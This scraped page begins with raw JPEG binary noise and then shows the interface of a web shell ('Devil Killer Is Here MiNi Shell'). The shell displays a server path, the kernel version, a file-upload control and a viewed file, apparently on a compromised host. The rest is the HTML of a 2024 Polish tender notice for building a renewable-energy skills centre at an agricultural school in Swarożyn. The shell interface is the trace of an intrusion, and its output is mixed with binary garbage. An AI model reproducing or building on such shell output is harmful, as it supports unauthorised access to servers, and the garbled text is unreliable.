JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240812/0045462001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Zaprojektowanie i budowa Branżowego Centrum Umiejętności w dziedzinie energetyka odnawialna - bioenergetyka w Zespole Szkół Centrum Kształcenia Rolniczego w Swarożynie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. St. Staszica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191887590</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Swarożyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-115</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 536 93 93</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">SZKOLA@ZSCKRSWAROZYN.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zsckrswarozyn.szkolnastrona.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Jednostka Budżetowa III stopnia prowadzona przez MRiRW w Warszawie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zaprojektowanie i budowa Branżowego Centrum Umiejętności w dziedzinie energetyka odnawialna - bioenergetyka w Zespole Szkół Centrum Kształcenia Rolniczego w Swarożynie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed1f9b39-a34c-4fa7-ae97-35636a82960b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00454620</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Zaprojektowanie i budowa Branżowego Centrum Umiejętności w dziedzinie energetyka odnawialna - bioenergetyka w Zespole Szkół Centrum Kształcenia Rolniczego w Swarożynie” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ed1f9b39-a34c-4fa7-ae97-35636a82960b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. Komunikacja w niniejszym<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie odbywa się przy użyciu środków<br/>komunikacji elektronicznej, tj. przy użyciu: platformy e-Zamówienia.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie<br/>e-Zamówienia. Instrukcja jak założyć konto dostępna jest pod adresem https://media.ezamowienia.gov.pl/pod/2020/11/ZKU-5.2.pdf.<br/>Wykonawca zobowiązany jest do zapoznania się z powyższą Instrukcją.<br/>3. Instrukcja składania ofert znajduje się w na platformie e-Zamówienia pod adresem<br/>https://media.ezamowienia.gov.pl/pod/2021/10/Oferty-5.1.pdf. Wykonawca zobowiązany jest do zapoznania się z powyższą<br/>Instrukcją.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>platformy e-Zamówienia.<br/>5. Za datę przekazania oferty, oświadczeń, o których mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów oraz innych informacji przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę e Zamówienia.<br/>6. Oświadczenia, wnioski, zawiadomienia oraz informacje uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed<br/>upływem wyznaczonego terminu. Korespondencja inna niż oferta może być przekazywana również na wyżej podany adres e-mail<br/>Zamawiającego.<br/>7. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza<br/>do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na wskazany adres email Zamawiającego.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi<br/>w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowania o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy<br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>8. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>9. Dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Pani/Pana danych osobowych jest Dyrektor<br/>Zespołu Szkół Centrum Kształcenia Rolniczego im. St. Staszica, ul. Szkolna 2, 83-115 Swarożyn, (zwany dalej jako „Administrator”).<br/>2. Administrator wyznaczył Inspektora ochrony danych, z którym można się kontaktować pisząc na adres email:<br/>iod@zsckrswarozyn.pl we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych<br/>z przetwarzaniem danych.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>1) art. 6 ust. 1 lit c RODO w związku z Pzp, w celu przeprowadzenia i rozstrzygnięcia postępowania o udzielenie zamówienia<br/>publicznego;<br/>2) art. 6 ust. 1 lit. b RODO w celu zawarcia z wybranym wykonawcą umowy w sprawie zamówienia publicznego i wykonanie tej<br/>umowy.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 Pzp oraz partnerzy świadczący usługi techniczne, firmy archiwizujące dokumenty, operator<br/>pocztowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): 5. Pani/Pana dane osobowe będą przechowywane, zgodnie 78 ust. 1 oraz ust. 4 Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem określonym w<br/>przepisach ustawy Pzp związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; W celu realizacji powyższych prawa prosimy o kontakt<br/>z Administratorem na adres e-mail: iod@zsckrswarozyn.pl bądź pisemnie na adres: ul. Szkolna 2, 83-115 Swarożyn;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">01/2024/ZSCKR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nazwa zadania:<br/>„Zaprojektowanie i budowa Branżowego Centrum Umiejętności w dziedzinie energetyka odnawialna - bioenergetyka w<br/>Zespole Szkół Centrum Kształcenia Rolniczego w Swarożynie”<br/>2. Miejsce realizacji zadania:<br/>ul. Szkolna 2, 83-115 Swarożyn, województwo: pomorskie.<br/>dz. nr 302/2 i 300/7, obręb 0018, Swarożyn.<br/>3. Przedmiot zamówienia.<br/>Przedmiotem zamówienia jest kompleksowa realizacja w formule zaprojektuj i wybuduj inwestycji polegającej na<br/>zaprojektowaniu i budowie Branżowego Centrum Umiejętności w dziedzinie energetyka odnawialna - bioenergetyka w<br/>Zespole Szkół Centrum Kształcenia Rolniczego w Swarożynie.<br/>4. W ramach zadania Wykonawca będzie zobowiązany do:<br/>1) Wykonania projektu budowalnego, zgodnie z obowiązującymi przepisami oraz Programem funkcjonalno-użytkowym i<br/>Projektem koncepcyjnym oraz do wystąpienia i uzyskania prawomocnego pozwolenia na budowę;<br/>2) Wykonania projektów wykonawczych, specyfikacji technicznych wykonania<br/>i odbioru robót;<br/>3) Wykonania robót budowlanych zgodnie z zaakceptowaną przez Zamawiającego dokumentacją projektową oraz wydaną<br/>dla inwestycji prawomocną decyzją<br/>o pozwolenie na budowę.<br/>4) Opracowania dokumentacji powykonawczej po zrealizowaniu robót budowlanych oraz uzyskania niezbędnych decyzji<br/>pozwalających na użytkowanie obiektu.<br/>5) Sprawowanie nadzoru autorskiego podczas całościowej realizacji zadania objętego dokumentacją projektową<br/>opracowaną przez Wykonawcę.<br/>5. Ogólna charakterystyka nowoprojektowanego obiektu.<br/>Inwestycja obejmuje zaprojektowanie i wybudowanie obiektu edukacyjnego, dwukondygnacyjnego bez podpiwniczenia z<br/>dachem płaskim na planie prostokąta oraz parterowego łącznika z istniejąca zabudową Warsztatów zgodnie z wytycznymi<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>PFU oraz Decyzji Lokalizacji Inwestycji Celu Publicznego. W budynku przewiduje się zabudowanie jednej klatki schodowej<br/>oraz windy. Obiekt przystosowany dla osób<br/>o ograniczonej zdolności poruszania oraz niedowidzących. W obiekcie należy zlokalizować pomieszczenia: biurowe,<br/>socjalne, pracownie komputerowe, sale laboratoryjne z zapleczem technicznym, sanitariaty oraz salę wykładową. Wysokość<br/>pomieszczeń po wykończeniu sufitami podwieszanymi min. 3,00m oraz min. 3,30m dla pomieszczeń laboratoryjnych i sali<br/>wykładowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni oferty z zastosowaniem następujących kryteriów oceny ofert:<br/>1) Kryterium nr 1: Cena z wagą 60%.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>2) Kryterium nr 2: Gwarancja z wagą 40 %.<br/>2. W kryterium cena oceniana będzie całkowita cena oferty. Oferta z najniższą ceną otrzyma maksymalną liczbę punktów. Pozostałe<br/>oferty zostaną ocenione zgodnie<br/>z wzorem<br/>Pofx = (Cmin / Cx ) x 60 pkt<br/>gdzie:<br/>Pofx - liczba punktów w kryterium „Cena” dla oferty o numerze „x”<br/>Cmin– najniższa cena realizacji brutto oferty spośród wszystkich rozpatrywanych ofert<br/>Cx – cena realizacji brutto oferty o numerze „x”<br/>Maksymalna ilość punktów, jakie może otrzymać oferta za dane kryterium: 60 pkt.<br/>3. W kryterium Gwarancja zamówienia ocenie będzie podlegać wydłużenie okresu gwarancji: jeżeli Wykonawca zaoferuje termin<br/>gwarancji:<br/>12 miesięcy otrzyma 0 pkt<br/>24 miesięcy otrzyma 20 pkt<br/>36 miesięcy otrzyma 40 pkt<br/>4. Maksymalna ilość punktów, jakie może otrzymać oferta za dane kryterium: 40 pkt.<br/>5. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie ze wszystkich kryteriów. Ocenę<br/>łączną oferty stanowi suma punktów uzyskanych w ramach poszczególnych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez Wykonawcę spełnienia następujących warunków udziału w postępowaniu<br/>określonych w art. 112 ust. 2 Pzp:<br/>1) Wykonawca zobowiązany jest wykazać, że dysponuje środkami finansowymi lub posiada zdolność kredytową na kwotę<br/>nie mniejszą niż 1 000 000,00 zł (słownie: jeden milion złotych), a w przypadku, gdy wartość środków finansowych lub<br/>zdolność kredytowa zostały określona w walucie innej niż złoty przeliczenie nastąpi wg średniego kursu złotego<br/>ogłoszonego przez Prezesa NBP<br/>i obowiązującego w dniu publikacji ogłoszenia o zamówieniu.<br/>2) Zdolności technicznej lub zawodowej:<br/>a) Wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a w przypadku prowadzenia<br/>działalności w okresie krótszym – w tym okresie wykonał dwie roboty budowlane polegające na budowie budynku, a roboty<br/>te zostały wykonane należycie w szczególności zgodnie<br/>z przepisami prawa budowlanego i prawidłowo zakończone (w przypadku, gdy wartość umowy została określona w walucie<br/>innej niż złoty przeliczenie nastąpi wg średniego kursu złotego ogłoszonego przez Prezesa NBP i obowiązującego<br/>w dniu podpisania umowy na realizację roboty budowlanej), w tym:<br/>(i) co najmniej 1 budynek o wartości wykonanych robót budowlanych nie niższej niż 1 000 000,00 PLN brutto,<br/>(ii) co najmniej 1 budynek użyteczności publicznej o powierzchni netto nie mniejszej niż 400 m2;<br/>b) Wykonawca dysponuje lub będzie dysponował i skieruje do realizacji zamówienia osoby o odpowiednich kwalifikacjach<br/>zawodowych, wykształceniu<br/>i doświadczeniu, niezbędnych do prawidłowej realizacji zamówienia (osoby tworzące kluczowy zespół projektowy), tj.:<br/>(i) co najmniej jedną osobę do pełnienia funkcji kierownika zespołu projektowego, która posiada uprawnienia budowlane do<br/>projektowania bez ograniczeń w specjalności architektonicznej lub konstrukcyjno-budowlanej oraz była kierownikiem<br/>zespołu projektowego przy wykonaniu dokumentacji projektowej wielobranżowej obejmującej projekt budowlany oraz projekt<br/>wykonawczy dla budynku o powierzchni netto nie mniejszej niż 400 m2;<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>(ii) co najmniej jedną osobę do pełnienia funkcji projektanta w specjalności architektonicznej, która posiada uprawnienia<br/>budowlane do projektowania w specjalności architektonicznej,<br/>(iii) co najmniej jedną osobę do pełnienia funkcji projektanta w specjalności 